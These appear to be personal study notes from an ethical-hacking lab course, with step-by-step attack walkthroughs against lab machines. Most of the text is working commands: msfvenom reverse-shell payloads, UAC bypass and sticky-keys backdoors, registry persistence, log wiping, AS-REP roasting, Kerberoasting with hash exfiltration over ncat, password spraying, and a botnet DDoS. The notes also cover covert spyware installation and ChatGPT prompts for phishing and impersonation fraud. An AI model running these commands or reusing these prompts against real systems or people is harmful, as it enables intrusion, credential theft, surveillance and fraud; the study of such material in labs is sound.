Escalate Privileges by Bypassing UAC and Exploiting Sticky Keys :~
- we are exploiting Sticky keys feature to gain access and to escalate privileges on the target machine
- switch to the Parrot Security machine and login with attacker/toor
- sudo su and cd for root directory
- run command for creating a payload:
```
    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Windows.exe
```
- -f = file formate
- = store output in to this file
- i want to share the payload from host system to target machine
- to create share directory and give all owner permission to that directory:
```
    //to create directory
    mkdir /var/www/html/share

    //to give full permission
    chmod -R 755 /var/www/html/share

    //to change user to owner
    chown -R www-data:www-data /var/www/html/share
```
- Copy the payload into the shared folder by executing:
```
    cp /home/attacker/Desktop/Windows.exe /var/www/html/share/
```
- Start the Apache server by executing
- service apache2 start
- open metasploit framework and set payload and create listner for listening
```
    msfconsole    
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp 
    set lhost <host_ip>
    set lport <host_port>
    run
```
- switch back to the windows or target machine and Open any web browser
- http://10.10.1.13/share
- download the file inside that directory
- switch to the Parrot Security machine and type
- sysinfo
- getuid
- bypass the user account control setting(in metasploit)
- background(this is for clearing the current sesssion)
- search bypassuac(this is module)
- we are using the fodhelper for this
- use exploit/windows/local/bypassuac_fodhelper
- set session 1
- show options
- set LHOST <host_ip>
- set TARGET 0
- exploit
- getsystem -t 1
- getuid
- The BypassUAC exploit has successfully
- background
- we will use sticky_keys module present in Metasploit to exploit the sticky keys feature in Windows 11
```
    use post/windows/manage/sticky_keys
    sessions -i*
    set session 2
    exploit
```
- Martin is a user account without any admin privileges, lock the system and from the lock screen press Shift key 5 times
- this will open a command prompt on the lock screen
- whoami
- We can see that we have successfully got a persistent System level access to the target system by exploiting sticky keys

Maintain Remote Access and Hide Malicious Activities

User System Monitoring and Surveillance using Spyrix :~
- Spyrix is a commercial spyware/keylogger that is often marketed as “parental control” software, but in reality it works like a surveillance tool
- open host machine and lanch spyrix and register in the website of the spyrix
- give your gmail and login to spyrix
- find remote desktop connection to connect target system connection using target system ip address and username
- remote desktop connection
- <target_ip>
- <target_username>
- minimize remote desktop connection in target machine and copy spyrix from host machine to target machine
- open spyrix in target machine
- enter same gmail which gmail you are login in host machine
- clear the process and delete that spyrix and close the target remote connection
- in host machine maximize the spyrix web and the new device connected pop-up appears
- now u will connect and servellence or get all data of the target machine
- you will create your report also
Maintain Persistence by Modifying Registry Run Keys :~
- parrot terminal
- sudo su and cd for root terminal
- create a payload as Test.exe
```
    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=444 -f exe > /home/attacker/Desktop/Test.exe
```
- create a payload as registry.exe
```
    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=4444 -f exe > /home/attacker/Desktop/registry.exe
```
- to create, give full owner access to share directory in /var/www/html/
```
    mkdir /var/www/html/share
    chmod -R 755 /var/www/html/share/
    chown -R www-data:www-data /var/www/html/share
```
- Copy the both payloads into the shared folder
```
    cp /home/attacker/Desktop/Test.exe /var/www/html/share/
    cp /home/attacker/Desktop/registry.exe /var/www/html/share/
```
- service apache2 start
- msfconsole
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp
- set lhost <host_ip>
- set lport <host_port>
- run
- open target machine
- open web browser and type http://<host_ip>/directory_name
- download both payloads in target machine
- double click test.exe
- The meterpreter session has successful
- getuid
- background
- in metasploit using silentcleanup module
```
    use exploit/windows/local/bypassuac_silentcleanup
    set LHOST <host_ip>
    set target 0 
    exploit  
```
- The BypassUAC exploit has successfully bypassed the UAC setting
- getsystem -t 1
- getuid
- open the shell in their using command shell
```
    reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_EXPAND_SZ /d "C:\Users\Admin\Downloads\registry.exe"
```
- open another terminal window
  - msfconsole
  - use exploit/multi/handler
  - set payload windows/meterpreter/reverse_tcp
  - set lhost <host_ip>
  - set lport <host_port>
  - exploit
- go to the target machine and restart the machine
- switch to the Parrot Security machine and you can see that the meterpreter session is opened.
- getuid
- attacker can maintain persistence on the target machine using Run Registry keys

Clear Logs to Hide the Evidence of Compromise

Clear Windows Machine Logs using Various Utilities :~
- There are various Windows utilities that can be used to clear system logs such as
  - Clear_Event_Viewer_Logs.bat
  - wevtutil
  - Cipher
- Clear_Event_Viewer_Logs.bat:
  - go to the target machine and run Clear_Event_Viewer_Logs.bat(Run as administrator)
  - Command Prompt window appears, and the utility starts clearing the event logs
  - Clear_Event_Viewer_Logs.bat is a utility that can be used to wipe out the logs of the target system
- wevtutil:
  - Command Prompt(Run as administrator)
  - wevtutil el = command to display a list of event logs
  - wevtutil cl System = command for clear all log in system
  - wevtutil is a command-line utility used to retrieve information about event logs and publishers
- cipher:
  - Command Prompt
  - cipher /w:[Drive or Folder or File Location]
  - The Cipher.exe utility starts overwriting the deleted files, first, with all zeroes (0x00); second, with all 255s (0xFF)
  - Cipher.exe is an in-built Windows command-line tool that can be used to securely delete a chunk of data by overwriting it to prevent its possible recovery
Clear Linux Machine Logs using the BASH Shell :~
- switch to the Parrot Security machine
- export HISTSIZE=0 (command to disable the BASH shell from saving the history)
- history -c (command to clear the stored history)
- history -w (command to delete the history of the current shell)
- shred ~/.bash_history (command to shred the history file, making its content unreadable)
- more ~/.bash_history (command to view the shredded history content)
- ctrl+z (to stop viewing the shredded history content)
- shred ~/.bash_history && cat /dev/null > .bash_history && history -c && exit (This command first shreds the history file, then deletes it, and finally clears the evidence of using this command)

Perform Active Directory (AD) Attacks Using Various Tools

Perform Initial Scans to Obtain Domain Controller IP and Domain Name :~
- Terminal
- sudo su
- cd command to jump to the root directory
- nmap 10.10.1.0/24 (command to scan the entire subnet and identify the DC IP address)
- nmap shows that host 10.10.1.22 has port 88/TCP kerberos-sec and port 389/TCP LDAP opened which confirms that our DC IP address is 10.10.1.22
- nmap -A -sC -sV 10.10.1.22
- we get the domain name which is CEH.com
Perform AS-REP Roasting Attack :~
- Terminal
- sudo su
- cd command to jump to the root directory
- cd impacket/examples/
- Python script to retrieve AD user information:
```
    python3 GetNPUsers.py CEH.com/ -no-pass -usersfile /root/ADtools/users.txt -dc-ip 10.10.1.22
```
  - GetNPUsers.py: Python script to retrieve AD user information
  - CEH.com/: Target AD domain
  - -no-pass: Flag to find user accounts not requiring pre-authentication
  - -usersfile ~/ADtools/users.txt: Path to the file with the user account list
  - -dc-ip 10.10.1.22: IP address of the DC to query
- We can observe that the user Joshua has DONT_REQUIRE_PREAUTH set. As this user is vulnerable to AS-REP roasting, we obtain Joshua's password hash
- Copy that hash and save it as joshuahash.txt
- echo '[HASH]' > joshuahash.txt
- crack the password hash and will give us the password in plain text
```
     john --wordlist=/root/ADtools/rockyou.txt joshuahash.txt
```
- The password for the user Joshua has been cracked - cupcake
Spray Cracked Password into Network using CrackMapExec :~
- Terminal
- sudo su
- cd command to jump to the root directory
- from the Nmap results we can observe that other hosts in the subnet are running services such as RDP, SSH, and FTP
- we can perform password spraying on each service individually to check for correct credentials
```
    cme rdp 10.10.1.0/24 -u /root/ADtools/users.txt -p "cupcake" (perform password spraying)
```
  - rdp: Targets the Remote Desktop Protocol (RDP) service
  - 10.10.1.0/24: IP address range to target, encompassing all hosts within the subnet 10.10.1.0 with a subnet mask of 255.255.255.0
  - -u /root/ADtools/users.txt: Specifies the path to the file containing user accounts for authentication
  - -p "cupcake": Password which we cracked using AS-REP Roasting to test against the RDP service on the specified hosts
- After the spray completion we find that user Mark is using the same password cupcake on host 10.10.1.40
- elect Remmina and open it and enter IP address 10.10.1.40 to connect (10.10.1.40 is the IP address
- Enter RDP authentication credentials
- A Remote Desktop connection will be successfully established
- Minimize the Remmina window.
Perform Post-Enumeration using PowerView :~
- cd /root/ADtools (move into the ADtools folder)
- we will attempt post-enumeration to gather additional information about the AD
- For enumeration purposes, we will utilize the PowerView.ps1 script
- python3 -m http.server to start the HTTP server
- return to Remmina where our RDP session is active
- navigate to the URL http://10.10.1.13:8000/PowerView.ps1
- launch PowerShell
- Navigate to the Downloads folder by running the command cd Downloads
- powershell -EP Bypass
- .\PowerView.ps1
- Get-NetComputer (command in PowerShell. This command will display all the information related to computers in AD)
- Get-NetGroup (in PowerShell. The Get-NetGroup command in PowerView lists all groups in AD)
- Get-NetUser in PowerShell. Get-NetUser in PowerView retrieves detailed information about AD user accounts,such as usernames and group memberships
- we found a new user SQL_srv
- PowerView.ps1 for enumeration:
  - Get-NetOU - Lists all organizational units (OUs) in the domain
  - Get-NetSession - Lists active sessions on the domain
  - Get-NetLoggedon - Lists users currently logged on to machines
  - Get-NetProcess - Lists processes running on domain machines
  - Get-NetService - Lists services on domain machines
  - Get-NetDomainTrust - Lists domain trust relationships
  - Get-ObjectACL - Retrieves ACLs for a specified object
  - Find-InterestingDomainAcl - Finds interesting ACLs in the domain
  - Get-NetSPN - Lists service principal names (SPNs) in the domain
  - Invoke-ShareFinder - Finds shared folders in the domain
  - Invoke-UserHunter - Finds where domain admins are logged in
  - Invoke-CheckLocalAdminAccess - Checks if the current user has local admin access on specified machines
Perform Attack on MSSQL service :~
- We will attempt to brute force the password using Hydra, as we already know the username, which is SQL_srv
- Terminal
- sudo su
- Save the username SQL_srv in a text file and name it as user.txt using command pluma user.txt
- to brute force the MSSQL service password
```
    hydra -L user.txt -P /root/ADtools/rockyou.txt 10.10.1.30 mssql                  
```
- We have successfully cracked the password for SQL_srv, which is "batman"
- we will attempt to log into the service using mssqlclient.py
- python3 /root/impacket/examples/mssqlclient.py CEH.com/SQL_srv:batman@10.10.1.30 -port 1433
- SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name='xp_cmdshell';
- we know that xp_cmdshell is enabled on SQL server we can use Metasploit to exploit this service. Type exit
- open msfconsole
```
    use exploit/windows/mssql/mssql_payload
    set RHOST 10.10.1.30
    et USERNAME SQL_srv
    set PASSWORD batman
    set DATABASE master
    exploit
```
Perform Privilege Escalation :~
- WinPEASx64.exe = tool for Windows privilege escalation, identifying misconfigurations and vulnerabilities for potential exploitation
- we will use WinPEAS.exe to enumerate any misconfigurations
- We will upload the WinPEAS.exe file and execute it in Windows
- Move to C:\ using the command cd C:\
- move to C:\Users\Public\Downloads using cd and execute the command powershell
- we need to host winPEASx64.exe on the attacker machine using Python
- sudo su
- cd /root/ADtools
- python3 -m http.server (host the winPEASx64.exe file)
- Get back to the shell terminal and type
```
    wget http://10.10.1.13:8000/winPEASx64.exe -o winpeas.exe
```
- ./winpeas.exe
- Open a new terminal with root privileges using the command sudo su and toor as password
- msfvenom -p windows/shell_reverse_tcp lhost=10.10.1.13 lport=8888 -f exe > /root/ADtools/file.exe
- Get back to our shell terminal and move to C:\Program Files\CEH Services
- cd ../../.. ; cd "Program Files/CEH Services"
- move file.exe file.bak ; wget http://10.10.1.13:8000/file.exe -o file.exe
- nc -nvlp 8888
- assuming we are the victim now. Restart the machine by hovering over Power and Display button and click Reset/Reboot button present at the toolbar located above the virtual machine and log in with the username SQL_srv and password "batman."
- we got the shell to our netcat listener
Perform Kerberoasting Attack :~
- In the netcat shell, execute the powershell command to launch PowerShell
- cd ../.. ; cd Users\Public\Downloads (Navigate to C:\Users\Public\Downloads)
- we will be downloading Rubeus and netcat:
```
    wget http://10.10.1.13:8000/Rubeus.exe -o rubeus.exe ; wget http://10.10.1.13:8000/ncat.exe -o ncat.exe
```
- Once the tools are downloaded type exit
- cd ../.. && cd Users\Public\Downloads (move into the Download directory)
- rubeus.exe kerberoast /outfile:hash.txt
- After kerberoasting the password hash for DC-Admin is saved in hash.txt file
- Open a new terminal, type sudo su and press Ente
- nc -lvp 9999 > hash.txt
- ncat.exe -w 3 10.10.1.13 9999 < hash.txt
- Get back to the netcat listener terminal and press Enter to save the file
- we will be using HashCat to crack the password hash
```
    we will be using HashCat to crack the password hash
```
  - -m 13100: This specifies the hash type. 13100 corresponds to Kerberos 5 AS-REQ Pre-Auth etype 23 (RC4-HMAC), a specific format for Kerberos hashes
  - --force: This option forces Hashcat to ignore warnings and run even if there are compatibility issues. Use this with caution, as it might cause instability or incorrect results
  - -a 0: This specifies the attack mode. 0 stands for a straight attack, which is a simple dictionary attack where Hashcat tries each password in the dictionary as it is
  - hash.txt: is the input file containing the hashes to crack
  - /root/ADtools/rockyou.txt: is the wordlist file used for the attack
- we get the password advanced!
- As DC-Admin has high privileges on the domain, we can use this password for further attacks

Perform System Hacking using AI

Perform System Hacking using ShellGPT :~
- after activation of the sgpt in the terminal window run
```
    sgpt --shell "Use msfvenom to create a TCP payload with lhost=10.10.1.13 and lport=444"
```
- run ls command to display a list of files in the directory and you can observe a file named as payload.exe has been created
- initialize listener on the given LHOST and LPORT
```
    sgpt --shell "Use msfconsole to start a listener with lhost=10.10.1.13 and lport=444"
```
- Msfconsole successfully initializes the listener
- As we are not executing payload in the victim's machine, you will not be able to establish any session
- exit command to exit msfconsole
- to perform SSH-bruteforce attack on the target machine:
```
    sgpt --shell "Use Hydra to perform SSH-bruteforce on IP address=10.10.1.9 using username.txt and password.txt files available at location /home/attacker/Wordlist"
```
- Using the provided wordlist files, Hydra cracks SSH username and password of the target machine
- demonstrate image stegnography. (here, cover.jpg file is located at /home/attacker):
```
    sgpt --shell "Perform stegnography using steghide to hide text 'My swiss account number is 232343435211113' in cover.jpg image file with password as '1234'"
```
- The given text is embedded to cover.jpg file
- navigate to /home/attacker and double-click cover.jpg file to view the image file
- Navigate back to the Terminal window
- we will extract hidden text from the cover.jpg file by executing:
```
    sgpt --shell "Use steghide to extract hidden text in cover.jpg"
```
- Enter passphrase prompt, type 1234 and press Enter
- next prompt, type y and press Enter
- extracted data is stored in the secret.txt file
- run pluma secret.txt command to view the extracted data file

Malware Threats

Gain Access to the Target System using Trojans

Gain Control over a Victim Machine using the njRAT RAT Trojan :~
- we are using njRAT(njRAT v0.8d.exe) for exploit the target mechine using trojan
- njRAT GUI appears; click the [Build] button located in the lower-left corner of the GUI to configure the exploit details
- Host field, check the options Randomize Stub, USB Spread Nj8d, Protect Prosess [BSOD], leave the other settings to default, and click Build
- we share that .exe file to victim mechine and execute that file and we can get that access

Infect the Target System using a Virus

Create a Virus using the JPS Virus Maker Tool and Infect the Target System :~
- Tool : JPS virus maker(ethical hacker and pemetration tester uses ths tool)
- we creating the virus file in attaker system and send that system to victim mechine
- when the victim execute that file victim is attacked by the virus
- it will desable all the features what attacker select
- attacker change the system password also

Perform Static Malware Analysis

Perform Malware Scanning using Hybrid Analysis :~
- tool = hybrid analysis
```
     https://www.hybrid-analysis.com
```
- we are using the hybrid analysis for scanning the malicious file
- open the hyberid analysis and drag and drop the malicious file
- ofter analysis it will give all the report about malicious file
- other local and online malware scanning tools:
  - Any.Run:
```
     https://app.any.run
```
  - Valkyrie Sandbox:
```
     https://valkyrie.comodo.com 
```
  - JOESandbox Cloud:
```
     https://www.joesandbox.com  
```
  - Jotti:
```
     https://virusscan.jotti.org 
```
Analyze ELF Executable File using Detect It Easy (DIE) :~
- ELF = Executable and linkable formate
- DIE = Detect It Easy(its a tool)
- we are using DIE tool to know about malware and its structure and want to know more about this
- to identify packing/obfuscation methods
- DIE is give all the information about malware
- open the DIE tool and insert the file or text file and it will give all info about the malware
- use other packaging/obfuscation tools:
  - Macro_Pack:
```
     https://github.com
```
  - UPX:
```
     https://upx.github.io 
```
  - ASPack:
```
     http://www.aspack.com  
```
  - JVMprotect:
```
     https://vmpsoft.com 
```
Perform Malware Disassembly using IDA and OllyDbg :~
- tools:
  - iDA = interactive disassembler
  - OllyDbg = its a debugger
  - we are using these two tools for perform malware disassmbly using IDA and ollydbg to reveal the hidden instructions and behaviours of malware understand how it works internally and creste accurate detection and defense stratargies
  - we open the IDA tool for deasseble the malicious file into human readable formate
  - we will check flowchat is inside the grap and we will see the function call and we will see the call flow(WinGraph32 Call flow)
  - we will open the ollydbg and insert the file and cpu main thread page appears
  - check log
  - check executable module
  - check memory cap
  - check thread

Perform Dynamic Malware Analysis

Perform Port Monitoring using TCPView and CurrPorts :~
- tools:
  - TCPView = this shows all TCP ports process in our system
  - currports = this shows all ports process in our system
- open TCPview it will show you all the process in port under tcp
- if you dont want any process you can kill the process
- open currports and it will show all the port rummimg im the system it you want any port you can kill that process
- one thing is once you kill any process attacker never connect back to that system
- other port monitoring tools:
  - TCP Port/Telnet Monitoring:
```
     https://www.dotcom-monitor.com
```
  - PRTG Network Monitor:
```
     https://www.paessler.com
```
  - SolarWinds Open Port Scanner:
```
     https://www.solarwinds.com  
```
Perform Process Monitoring using Process Monitor :~
- tool:
  - processmonitor = show all the processes running in your system
- open processmonitor and it show all the processes running in your system
- we can get all the details about any process
- other process monitoring tools:
  - Process Explorer:
```
     https://docs.microsoft.com
```
  - OpManager:
```
     https://www.manageengine.com
```
  - Monit:
```
     https://mmonit.com  
```
  - ESET SysInspector:
```
     https://www.eset.com  
```
  - System Explorer:
```
     https://systemexplorer.net 
```

Sniffing

Perform Active Sniffing

Perform MAC Flooding using macof :~
- launch Parrot Security machine
- open wireshark and select the interface(eth0)
- open terminal and sudo su and cd for root directory
- using macof comand:
```
     macof -i eth0 -n 10
     //if you are doing mac flooding for one targeted system also use this 
     macof -i eth0 -d <target ip>
```
  - -i = interface
  - -n = number of packets
  - -d = destination ip
- This command will start flooding the CAM table with random MAC addresses
- Wireshark window and observe the IPv4 packets from random IP addresses
- captured IPv4 packet and expand the Ethernet II node in the packet details section
- Macof sends the packets with random MAC and IP addresses to all active machines in the local network
- close all the tabs
Perform a DHCP Starvation Attack using Yersinia :~
- in Parrot Security machine, launch Wireshark and start packet capturing on available ethernet or interface
- Open a Terminal window and execute sudo su to run the programs as a root user and cd for root directory
- Run yersinia -I to open Yersinia
  - -I = Starts an interactive session
- command:
  - yersinia -I
  - h = help for command
  - F2 = select DHCP mod
  - y = exit
  - x = list all the attacks available
- select the option which you want i will press option 1
- Yersinia starts sending DHCP packets to the network interface
- press quit for q
- switch to the Wireshark window and observe the huge number of captured DHCP packets
- Click on any DHCP packet and expand the Ethernet II node
- close all tabs

Perform Network Sniffing using Various Sniffing Tools

Perform Password Sniffing using Wireshark :~
- Windows Server 2019 machine and login
- lunch the wireshark
- back to the windows 11 and open we browser and open website and login
```
     http://www.moviescope.com/
```
- login this website and come back to the windows server 2019
- open wireshark in the wireshark save the captured packets as password sniffing
- filter (Wireshark only filters http POST traffic packets):
```
     http.request.method == POST
```
- navigate to Edit --> Find Packet
- Find Packet section appears
  - Display filter --> String
  - Narrow & Wide --> Narrow (UTF-8 / ASCII)
  - Packet list --> Packet details
- In the field next to String, type pwd and click the Find
- Wireshark will now display the sniffed password from the captured packets
- Close the Wireshark window
- switch to the Windows 11 machine, close the web browser, and sign out from the Admin account
- switch back to the Windows Server 2019
- open remote desktop option and connect to the windows 11 Jason user in the ip of the 10.10.1.11
- remote connection is appears
- opem the contro pannel
  - system and security --> windows tools --> services --> remote packet capture protocal v.0(experimental) --> start
- status is showing as the running
- close all tabs including remote desktop connection also
- in Windows Server 2019, launch Wireshark and click on Capture options:
  - Manage Interfaces --> Remote Interfaces --> Add a remote host and its interface(+) --> create using user ip and port
- select created interface and start the wireshark
- open windows 11 using Jason user
- open browser and browse anything and what you brows in Jason account it will capture in the windowss server 2019 wireshark
- close all the tab

Detect Network Sniffing

Detect ARP Poisoning and Promiscuous Mode in a Switch-Based Network :~
- switch to the Windows Server 2019 machine
- In the Desktop window open the cain tool
- click Configure from the menu bar to configure an ethernet card
- The Sniffer tab is selected by default. Ensure that the Adapter associated with the IP address and then click ok
- Click the Start/Stop Sniffer icon and click the Sniffer tab
- Click the plus (+) icon or right-click in the window and select Scan MAC Addresses to scan the network for hosts
- The MAC Address Scanner window appears. Check the All hosts in my subnet radio button. Select the All Tests checkbox and then ok
- Cain & Abel starts scanning for MAC addresses and lists all those found
- a list of all active IP addresses along with their corresponding MAC addresses is displayed
- click the APR tab at the bottom
- Click the plus (+) icon; a New ARP Poison Routing window appears
- To monitor the traffic between two systems (here, Windows 11 and Parrot Security), from the left-hand pane, click to select 10.10.1.11 (Windows 11) and from the right-hand pane, click 10.10.1.13 (Parrot Security); click OK
- Click on the Start/Stop APR
- fter clicking on the Start/Stop APR icon, Cain & Abel starts ARP poisoning and the status of the scan changes to Poisoning
- you need to ping one target machine using the other
- switch to the Parrot Security machine and run sudo su and cd for root directory
- run :
```
     hping3 [Target IP Address] -c 100000
```
- switch to the Windows Server 2019 machine and open the wireshark
  - wireshark --> edit --> preferences --> protocal --> ARP/RARP --> Detect ARP request storms
- click ok
- and select the interface ethernet 2and ender its start capturing
- stop the capturing
- go to the analyse and expert information and we can see all the packet information over there
- close the wireshark and open the ubantu
- open terminal and sudo su for root user
- we check promiscous mode is on or off
- run the nmap script:
```
     nmap --script=sniffer-detect <Target IP Address>
```
- The scan results appear, displaying Likely in promiscuous mode under the Host script results section. This indicates that the target system is in promiscuous mode
- close all tabs

Social Engineering

Perform Social Engineering using Various Techniques

Sniff Credentials using the Social-Engineer Toolkit (SET) :~
- tool = Social Engineering tool(SET)
- Parrot Security machine. Login using attacker/toor
- Run setoolkit to launch Social-Engineer Toolkit
- The SET menu appears
  - Social-Engineering Attacks --> Website Attack Vectors --> Credential Harvester Attack Method --> Site Cloner
  - IP address for the POST back in Harvester/Tabnabbing =
  - Enter the url to clone = http://www.moviescope.com
  - press enter cloning will starts
- After cloning is completed, a highlighted message appears. The credential harvester initiates
- open the firefox and open the mail and send one phishing mail to the targeted user or anyone yo want to send
- send email with cloned(melicious) website link inside the mail
- go to the target mechine and open the target user mail and click the malicious link it will redirect to the moviescope website login page
- when user enter the login credentials on that login page those credentials are sniff and show in the attacker host mechine in plain text
- sniff the credential ia done
- close all tabs

Detect a Phishing Attack

Detect Phishing using Netcraft :~
- open the netcraft:
```
     https://www.netcraft.com/apps-extensions
```
- click LEARN MORE button under Browser Protection
- Download the extension today and click on Firefox logo(which browser you that)
- add the extension for firefox browser
- after the adding open any geniune website or link it will open
- open any phishing sites it will not open netcraft will block tha browser
- this is the detection of the phishing sites

Social Engineering using AI

Craft Phishing Emails with ChatGPT :~

open chatgpt
```
     chatgpt.com
```

ChatGPT main page appears. In the chat field, type

     I am Microsoft's customer support executive, write a concise mail stating that he/she has found suspicious login on user's account and ask then to reset the password on urgent basis. Provide the reset link at [Reset Link]

press enter The ChatGPT crafts a phishing mail as per the given prompt

Similarly, you can use prompts like

     Write an email from a company's IT administrator its employees letting them know that they need to install the latest security software. Provide a link where the employee can download the software. Let them know that all employees must complete the download by next Friday

ChatGPT provides also provides a functionality of regenerating the response, you can do so by clicking on Regenerate icon

we will craft an email by impersonating a person on the basis of his writing style. To do so, in the chat field, type

     Impersonate the Sam's writing style from the conversations given below and create a message for John saying that his father got massive heart attack today and he is in need of money so urging john for transferring the required amount of money to his account on urgent basis. Here is the previous conversations between Sam and John on various topics Topic: Nature and Its Beauty John: Hey Sam, have you ever marveled at the beauty of nature? The way the sun paints the sky during sunset is just breathtaking, isn't it? Sam: The celestial orb's descent into the horizon provides a resplendent spectacle, casting an ethereal kaleidoscope of hues upon the atmospheric canvas. Nature's grandeur unveils itself in the cosmic ballet of light and shadow. John: Yeah, I guess so. I just love how the colors change, you know? It's like a painting in the sky. Sam: The chromatic metamorphosis, a transient masterpiece, orchestrates a symphony of spectral transitions, manifesting the ephemeral artistry inherent in the terrestrial firmament

Apart from the aforementioned prompts, you can further use other prompts to craft a phishing mail and send to the victims in order to perform social engineering attacks
This concludes the demonstration of crafting phishing mails using ChatGPT

Denial-of-Service

Perform DoS and DDoS Attacks using Various Techniques

Perform a DDoS Attack using ISB and UltraDDOS-v2 :~
- tools:
  - ISB(i am so bored)
  - UltraDDOS-v2
- open window 11 and download ISB(im so bored)
- sing this tool we can perform various attacks such as HTTP Flood, UDP Flood, TCP Flood, TCP Port Scan, ICMP Flood, and Slowloris
- we will perform TCP Flood attack on the target Windows Server 2019 machine
- open the ISB tools :
  - URL = <target_ip>
  - port = <default 80 (our choice)>
  - click = set target
- under attack go to the TCP flood:
  - interval = 10
  - buffer = 256
  - threads = 1000
- Leave the ISB window running and click and open the windows server 2022
- download the ultraddos.exe
- In the Ultra DDOS v2 window, click on DDOS Attack button
- Please enter your target. This is the website or IP address that you want to attack = <target_ip>
- Please enter a port. 80 is most commonly used, but you can use any other valid port = 80
- Please enter the number of packets you would like to send. More is better, but too many will crash your computer = 1000000
- Please enter the number of threads you would like to send. This can be the same number as the packets = 1000000
- The attack will start once you press OK. It will keep going until all requested packets are sent
- As soon as you click on OK the tool starts DoS attack on the Windows Server 2019
- witch to the Windows 11 machine, and in the ISB window click on Start Attack button
- switch to the Windows Server 2019 machine
- search for resmon in the search bar and CPU utilization under CPU section is more than 80%
Perform a DDoS Attack using Botnet :~
- switch to the Parrot Security machine. Open a Terminal window and execute sudo su to run the programs as a root user
- Run the command for creating payload for system 1(windws 11):
```
     msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=6969 -f exe > exploit1.exe
```
- Run the command for creating payload for system 2(windows server 2019):
```
      msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=9999 -f exe > exploit2.exe 
```
- Run the command for creating payload for system 3(windows server 2022):
```
      msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.1.13 lport=5555 -f exe > exploit3.exe 
```
- Create a new directory to share the exploits file:
```
     mkdir /var/www/html/share
```
- provide the permissions:
```
     chmod -R 755 /var/www/html/share/
```
```
     chown -R www-data:www-data /var/www/html/share/
```
- Copy the payloads into the shared folder:
```
     cp exploit1.exe exploit2.exe exploit3.exe /var/www/html/share/
```
- Start the Apache server = service apache2 start
- Launch three new terminals and run command sudo su
- launch metasploit framework for create the handler or listener for those three payloads:
  - for system 1(windows 11):
```
     msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 6969; run"
```
  - for system 2(windows server 2019):
```
     msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 9999; run" 
```
  - for system 3(windows server 2022):
```
     msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.1.13; set lport 5555; run"  
```
- switch to the Windows 11 machine and go to = http://10.10.1.13/share
- download the exploit1.exe for this system and execute that file
- do the same thing with system 2 and system 3 also
- go back to the host mechine parrot and the meterpreter session has successfully been opened
- Now, we will upload the DDoS script to our botnets
- in windows shell terminal:
```
     upload /home/attacker/Downloads/eagle-dos.py
```
- run shell
  - run the DDoS file using command python eagle-dos.py
  - target ip address(for ex 10.10.1.9)
- Make sure you run script on all 3 shell terminals
- open target system and opne terminal with sudo wireshark
- Wait for 5-6 minutes, then click on Show Applications and search for and launch System Monitor
- in memory usage is 98.7% and which slows down Ubuntu machine and also makes it unresponsive

Detect and Protect Against DoS and DDoS Attacks

Detect and Protect Against DDoS Attacks using Anti DDoS Guardian :~
- open windows 11 and download Anti_DDoS_Guardian_setup.exe
- Setup - Anti DDoS Guardian window appears; click Next
- uncheck the install Stop RDP Brute Force option and click next
- install the that tool
- Completing the Anti DDoS Guardian Setup Wizard window appears; ensure that Launch Anti DDoS Guardian option is selected and click Finish
- switch to the Windows Server 2019 and download Low Orbit Ion Cannon (LOIC)
- inside the LOIC:
  - Select your target IP = <target_IP>
  - click = Lock on
- Under the Attack options:
  - method = UDP
  - Threads = 5
  - Slide the power bar to the middle
- switch to the Windows Server 2022 machine and follow the smae step of LOIC
- click the IMMA CHARGIN MAH LAZER button under the Ready? section to initiate the DDoS attack on the target
- witch back to the Windows 11 machine and observe the packets captured by Anti DDoS Guardian
- Observe the huge number of packets coming from the host machines (10.10.1.19 [Windows Server 2019] and 10.10.1.22 [Windows Server 2022]
- Double-click any of the sessions 10.10.1.19 or 10.10.1.22
- Anti DDoS Guardian Traffic Detail Viewer window appears, displaying the content of the selected session in the form of raw data
- you can observe the high number of incoming bytes from Remote IP address 10.10.1.22
- You can use various options from the left-hand pane such as Clear, Stop Listing, Block IP, and Allow IP
- Observe that the blocked IP session turns red in the Action Taken column

Session Hijacking

Perform Session Hijacking

Hijack a Session using Caido :~
- open windows 11
- open cmd as a administrator
- type command ipconfig/flushdns
- search caido and edit the menu biside the start button and edit it
- Edit Instance window, click on the radio button besides All interfaces (0.0.0.0) to listen on all the available network interfaces and click on Save
- login to the caido account and open the caido account
- Once logged in, Register your Caido Instance pop-up will appear. Type Session Hijacking and click Register
- Click on + Create a project button to create a new project. Create a project pop-up appears, name it as Session Hijacking
- Click on Intercept option
- Click the Forwarding icon and wait until it changes to Queuing
- go to the windows server 2019
- Open Firefox web browser and navigate to http://10.10.1.11:8080/ca.crt. CA certificate will be downloaded
- open the settings of the firefox and add the certification and add proxy ip of attackrs
- Set HTTP Proxy to 10.10.1.11 and port to 8080
- Open a new tab in Firefox web browser and place your mouse cursor in the address bar, type www.moviescope.com
- go back to the window 11 and open the caido
- on the request tab
- www.goodshopping.com in all the captured GET requests and Forward all the requests
- modify every GET request of www.moviescope.com to www.goodshopping.com
- now go back to the 2019 machine you will see the website is redirect to the www.goodshopping.com
Intercept HTTP Traffic using Hetty :~
- open windows 11 and open the hetty.exe
- it will running on the cmd and open the firefox and type
  - http://localhost:8080
- hetty will open in browser
- click the MANAGE PROJECTS button
- type Project name as Moviescope and click + CREATE & OPEN PROJECT button
- You can observe that a new project name Moviescope has been created under Manage projects section with a status as Active
- Click Proxy logs icon ( 2022-04-13_15-20-45.png)) from the left-pane
- open windows server 2022
- Open Google Chrome web browser, click the Customize and control Google Chrome icon, and select Settings
- enable the proxy and port
- the web browser go to http://www.moviescope.com
- go back to the windows 11
- You can observe that the logs are captured in the Proxy logs page. Here, we are focusing on logs associated with moviescope.com website
